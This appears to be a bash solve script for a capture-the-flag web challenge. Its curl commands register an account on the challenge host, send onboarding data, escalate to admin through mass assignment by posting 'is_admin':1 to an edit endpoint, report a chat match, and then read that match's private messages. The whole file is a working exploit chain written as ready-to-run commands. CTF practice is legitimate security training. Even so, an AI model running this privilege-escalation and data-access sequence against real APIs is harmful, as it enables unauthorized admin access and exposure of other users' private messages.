#!/bin/bash

URL="https://9f2c6b38bc4461a2b4545a00c94951e2.exploitme.challs.snakectf.org"
USERNAME="hitcat"
EMAIL="hitcat@snake.ctf"
PASSWORD="Secret123!"

# Step 1 : Register and get JWT
echo "[*] Registering user $USERNAME..."
TOKEN=$(curl -s -X POST "$URL/api/register" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"email\":\"$EMAIL\",\"password\":\"$PASSWORD\"}" \
  | jq -r .token)

if [ "$TOKEN" = "null" ] || [ -z "$TOKEN" ]; then
  echo "[!] Failed to get token during register"
  exit 1
fi
echo "[+] Token obtained: $TOKEN"

# Step 2 : Onboarding
echo "[*] Sending onboarding data..."
curl -s -X POST "$URL/api/onboarding" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "role": "WHITE_HAT",
    "looking_for": "WHITE_HAT",
    "age": 19,
    "likes": ["IoT"],
    "dislikes": ["SIM Swappers"],
    "bio": "Your leet bio here",
    "location": "Obviously, the Internet",
    "hacks": ["Morris Worm"],
    "favorite_hacker": "Kevin Mitnick",
    "favorite_song": "Careless Hacker",
    "favorite_movie": "My Little Pony: The Movie",
    "yt_embed": "https://www.youtube.com/embed/spY_RFBQu4E?si=hcQTihIIwkkG1mOc",
    "touches_grass": false
  }' | jq .

# Step 3 : Admin priv esc via mass assignment
echo "[*] Trying to escalate privileges (is_admin=1)..."
curl -s -X POST "$URL/api/edit" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":1}' | jq .

# Step 4 : Report match n°4
echo "[*] Reporting match 4..."
curl -s -X POST "$URL/api/chat/4/report" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Step 5 : Reading match n°4 messages
echo "[*] Reading messages from match 4..."
curl -s "$URL/api/chat/4" \
  -H "Authorization: Bearer $TOKEN" \
  | jq -r '.messages[] | .content'